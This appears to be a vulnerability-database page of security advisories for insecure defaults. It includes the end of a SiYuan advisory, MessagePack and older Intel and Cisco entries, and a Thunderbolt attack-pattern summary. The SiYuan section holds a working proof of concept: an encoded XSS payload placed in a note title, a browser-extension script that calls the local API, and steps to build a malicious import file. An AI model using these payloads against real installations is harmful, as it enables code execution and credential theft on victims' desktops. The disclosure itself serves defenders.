reads the attribute, `popover.ts:144` calls `decodeURIComponent` (decoding `%3C`/`%27`/`%3E` to literal `\u003c`/`\u0027`/`\u003e`), `tooltip.ts:41` writes `innerHTML` \u2014 HTML parser creates a real `\u003cimg\u003e` element, `onerror` fires.\n5. **`alert(\u0027SiYuan tooltip-XSS PoC\u0027)` pops.**\n\n### Step D \u2014 `.sy.zip` reproducer for upstream review\n\nFor maintainers who want a single-click reproducer:\n```sh\nZIP_PATH=$(curl -s -X POST $API/api/export/exportSY \\\n -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\" \\\n | python -c \u0027import sys,json; print(json.load(sys.stdin)[\"data\"][\"zip\"])\u0027)\n# The kernel re-encodes % in the URL, so it\u0027s simpler to grab from disk:\nSRC=$(ls -1t \"$HOME/SiYuanWorkspace/temp/export\"/*.sy.zip | head -1)\ncp \"$SRC\" \"$HOME/Desktop/tooltip-xss-poc.sy.zip\"\n```\nMaintainer reproduces by importing via right-click a notebook \u2192 **Import** \u2192 **SiYuan `.sy.zip`** \u2192 searching `trigger` \u2192 hovering the result. The Lute serialization stores the title in the `.sy` file with `%XX` preserved literally and `\"` HTML-entity-encoded \u2014 the IAL parser decodes the entities on load, leaving the URL escapes intact, which then feeds the `decodeURIComponent`-based bypass.\n\n### Step E \u2014 Browser-extension attack vector (the realistic remote path)\n\nA malicious or compromised installed browser extension\u0027s content/background script runs with `chrome-extension://\u003cid\u003e` Origin, allowlisted by `session.go:277`. The extension can run Step B\u0027s curl chain via `fetch()` without any SiYuan UI interaction beyond keeping the kernel running:\n```js\n(async () =\u003e {\n const api = (path, body) =\u003e fetch(\u0027http://127.0.0.1:6806\u0027 + path, {\n method: \u0027POST\u0027, headers: {\u0027Content-Type\u0027: \u0027application/json\u0027},\n body: JSON.stringify(body)\n }).then(r =\u003e r.json());\n const nb = await api(\u0027/api/notebook/lsNotebooks\u0027, {});\n const id = (await api(\u0027/api/filetree/createDocWithMd\u0027, {\n notebook: nb.data.notebooks[0].id,\n path: \u0027/x\u0027 + Date.now(),\n markdown: \u0027trigger\u0027\n })).data;\n await api(\u0027/api/filetree/renameDocByID\u0027, {\n id,\n title: `%3Cimg src=x onerror=\"alert(\u0027SiYuan tooltip-XSS PoC\u0027)\"%3E`\n });\n})();\n```\nA page from `https://attacker.com` is rejected \u2014 `IsLocalOrigin` only matches localhost/loopback. Realistic remote vectors: **browser extensions**, **localhost-served webpages**, **shared `.sy.zip` imports**, **sync replication from a co-author\u0027s compromised device**.\n\n### Cleanup\n\n```sh\nDOC_ID=$(curl -s -X POST $API/api/filetree/searchDocs \\\n -H \u0027Content-Type: application/json\u0027 -d \u0027{\"k\":\"trigger me\"}\u0027 \\\n | python -c \u0027import sys,json; r=json.load(sys.stdin)[\"data\"]; print(r[0][\"id\"] if r else \"\")\u0027)\n[ -n \"$DOC_ID\" ] \u0026\u0026 curl -s -X POST $API/api/filetree/removeDocByID \\\n -H \u0027Content-Type: application/json\u0027 -d \"{\\\"id\\\":\\\"$DOC_ID\\\"}\"\n```\n\n## Impact\n\n- **RCE on the victim\u0027s desktop**, triggered by hovering a search result (or any other `class=\"ariaLabel\"` element rendering attacker-controlled metadata).\n- **Doc titles are the most commonly-shared field** \u2014 recipients of `.sy.zip`, Bazaar templates, and sync peers all import the malicious title automatically; the URL encoding survives every transport.\n- Same post-RCE consequences as Advisory 1: full filesystem read (incl. `~/.ssh/`, `~/.aws/credentials`, workspace `conf/conf.json`), persistence, cloud-account pivot.\n- **Multiple alternative trigger surfaces** beyond search results: AV column names + descriptions, AV select-cell options, file-tree tooltips \u2014 any element with `class=\"ariaLabel\"` and `aria-label=\"${escapeAriaLabel(...)}\"` reaches the same `popover.ts \u2192 tooltip.ts` chain.\n- **CVE-2026-34585 fix is incomplete.** The encoder-side hardening assumed exactly one HTML decode between encoder and DOM. It did not account for `decodeURIComponent` being applied to the consumer-side attribute value, which converts URL-escapes that the encoder ignored into literal `\u003c` characters that initiate tag parsing. A consumer-side fix (`textContent`, or `DOMPurify.sanitize` on the rich-text path; and removing the unconditional `decodeURIComponent`) is required.",
"id": "GHSA-25rp-h46x-2hjm",
"modified": "2026-06-08T20:11:29Z",
"published": "2026-05-08T19:08:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-25rp-h46x-2hjm"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44588"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "SiYuan: Electron Renderer RCE via decodeURIComponent-driven tooltip XSS in aria-label sink (incomplete fix for CVE-2026-34585)"
}
GHSA-26X7-MR2M-X8M5
Vulnerability from github – Published: 2022-05-13 01:52 – Updated: 2022-05-13 01:52Installation tool IPDT (Intel Processor Diagnostic Tool) 4.1.0.24 sets permissions of installed files incorrectly, allowing for execution of arbitrary code and potential privilege escalation.
{
"affected": [],
"aliases": [
"CVE-2018-3667"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-07-10T21:29:00Z",
"severity": "HIGH"
},
"details": "Installation tool IPDT (Intel Processor Diagnostic Tool) 4.1.0.24 sets permissions of installed files incorrectly, allowing for execution of arbitrary code and potential privilege escalation.",
"id": "GHSA-26x7-mr2m-x8m5",
"modified": "2022-05-13T01:52:34Z",
"published": "2022-05-13T01:52:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3667"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00140.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-29PX-FJQX-XH4F
Vulnerability from github – Published: 2022-05-13 01:46 – Updated: 2022-05-13 01:46A vulnerability in Cisco Elastic Services Controllers could allow an authenticated, remote attacker to log in to an affected system as the Linux root user, aka an Insecure Default Password Vulnerability. More Information: CSCvc76631. Known Affected Releases: 2.2(9.76).
{
"affected": [],
"aliases": [
"CVE-2017-6688"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-06-13T06:29:00Z",
"severity": "HIGH"
},
"details": "A vulnerability in Cisco Elastic Services Controllers could allow an authenticated, remote attacker to log in to an affected system as the Linux root user, aka an Insecure Default Password Vulnerability. More Information: CSCvc76631. Known Affected Releases: 2.2(9.76).",
"id": "GHSA-29px-fjqx-xh4f",
"modified": "2022-05-13T01:46:45Z",
"published": "2022-05-13T01:46:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-6688"
},
{
"type": "WEB",
"url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170607-esc4"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/98973"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-2F33-PR97-265Q
Vulnerability from github – Published: 2026-06-25 18:52 – Updated: 2026-06-25 18:52Summary
The parameterless MessagePackInputFormatter() constructor uses default serializer options, which resolve to MessagePackSerializerOptions.Standard with MessagePackSecurity.TrustedData. The formatter is designed for ASP.NET Core MVC request bodies, which commonly cross an HTTP trust boundary.
This insecure default can expose applications to denial-of-service attacks that MessagePackSecurity.UntrustedData is intended to mitigate, such as hash-collision attacks against dictionary-like model properties.
Impact
Applications are affected when they register new MessagePackInputFormatter() without explicitly passing serializer options configured for untrusted data.
An unauthenticated or otherwise untrusted HTTP client can send MessagePack request bodies that are deserialized using the trusted-data posture. For models containing hash-based collections, this can enable algorithmic complexity attacks using colliding keys. The default constructor makes the unsafe posture easy to use at the exact boundary where request bodies should be treated as untrusted.
Affected components
- Package:
MessagePack.AspNetCoreMvcFormatter - API:
MessagePackInputFormatter()parameterless constructor - Scenario: ASP.NET Core MVC model binding from HTTP request bodies
- Finding IDs:
MESSAGEPACKCSHARP-OPEN-009, duplicateMESSAGEPACKCSHARP-095
Patches
Fixes are prepared and will be released in coordinated patch versions.
Upgrade guidance:
- Upgrade
MessagePack.AspNetCoreMvcFormatterto the patched version for your release line. - Upgrade companion MessagePack packages in the same dependency graph to the coordinated patched versions.
The fix should default the parameterless constructor to MessagePackSerializerOptions.Standard.WithSecurity(MessagePackSecurity.UntrustedData), or require callers to pass explicit options so the trust posture is deliberate.
Workarounds
Do not use the parameterless constructor on affected versions. Register the formatter with explicit untrusted-data options, for example:
options.InputFormatters.Add(
new MessagePackInputFormatter(
MessagePackSerializerOptions.Standard.WithSecurity(MessagePackSecurity.UntrustedData)));
Also apply normal HTTP request-size limits and model validation appropriate for your service.
Resources
MESSAGEPACKCSHARP-OPEN-009: MVC input formatter defaults to trusted-data security postureMESSAGEPACKCSHARP-095: duplicate finding for the same root cause- CWE-1188: Initialization of a Resource with an Insecure Default
{
"affected": [
{
"package": {
"ecosystem": "NuGet",
"name": "MessagePack"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.5.301"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "NuGet",
"name": "MessagePack"
},
"ranges": [
{
"events": [
{
"introduced": "3.0"
},
{
"fixed": "3.1.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48509"
],
"database_specific": {
"cwe_ids": [
"CWE-1188"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-25T18:52:46Z",
"nvd_published_at": "2026-06-22T22:16:47Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe parameterless `MessagePackInputFormatter()` constructor uses default serializer options, which resolve to `MessagePackSerializerOptions.Standard` with `MessagePackSecurity.TrustedData`. The formatter is designed for ASP.NET Core MVC request bodies, which commonly cross an HTTP trust boundary.\n\nThis insecure default can expose applications to denial-of-service attacks that `MessagePackSecurity.UntrustedData` is intended to mitigate, such as hash-collision attacks against dictionary-like model properties.\n\n## Impact\n\nApplications are affected when they register `new MessagePackInputFormatter()` without explicitly passing serializer options configured for untrusted data.\n\nAn unauthenticated or otherwise untrusted HTTP client can send MessagePack request bodies that are deserialized using the trusted-data posture. For models containing hash-based collections, this can enable algorithmic complexity attacks using colliding keys. The default constructor makes the unsafe posture easy to use at the exact boundary where request bodies should be treated as untrusted.\n\n## Affected components\n\n- Package: `MessagePack.AspNetCoreMvcFormatter`\n- API: `MessagePackInputFormatter()` parameterless constructor\n- Scenario: ASP.NET Core MVC model binding from HTTP request bodies\n- Finding IDs: `MESSAGEPACKCSHARP-OPEN-009`, duplicate `MESSAGEPACKCSHARP-095`\n\n## Patches\n\nFixes are prepared and will be released in coordinated patch versions.\n\nUpgrade guidance:\n\n1. Upgrade `MessagePack.AspNetCoreMvcFormatter` to the patched version for your release line.\n2. Upgrade companion MessagePack packages in the same dependency graph to the coordinated patched versions.\n\nThe fix should default the parameterless constructor to `MessagePackSerializerOptions.Standard.WithSecurity(MessagePackSecurity.UntrustedData)`, or require callers to pass explicit options so the trust posture is deliberate.\n\n## Workarounds\n\nDo not use the parameterless constructor on affected versions. Register the formatter with explicit untrusted-data options, for example:\n\n```csharp\noptions.InputFormatters.Add(\n new MessagePackInputFormatter(\n MessagePackSerializerOptions.Standard.WithSecurity(MessagePackSecurity.UntrustedData)));\n```\n\nAlso apply normal HTTP request-size limits and model validation appropriate for your service.\n\n## Resources\n\n- `MESSAGEPACKCSHARP-OPEN-009`: MVC input formatter defaults to trusted-data security posture\n- `MESSAGEPACKCSHARP-095`: duplicate finding for the same root cause\n- CWE-1188: Initialization of a Resource with an Insecure Default",
"id": "GHSA-2f33-pr97-265q",
"modified": "2026-06-25T18:52:46Z",
"published": "2026-06-25T18:52:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/MessagePack-CSharp/MessagePack-CSharp/security/advisories/GHSA-2f33-pr97-265q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48509"
},
{
"type": "PACKAGE",
"url": "https://github.com/MessagePack-CSharp/MessagePack-CSharp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "MessagePack-CSharp: ASP.NET Core MessagePackInputFormatter defaults to TrustedData for HTTP request bodies"
}
No mitigation information available for this CWE.
CAPEC-665: Exploitation of Thunderbolt Protection Flaws
An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow.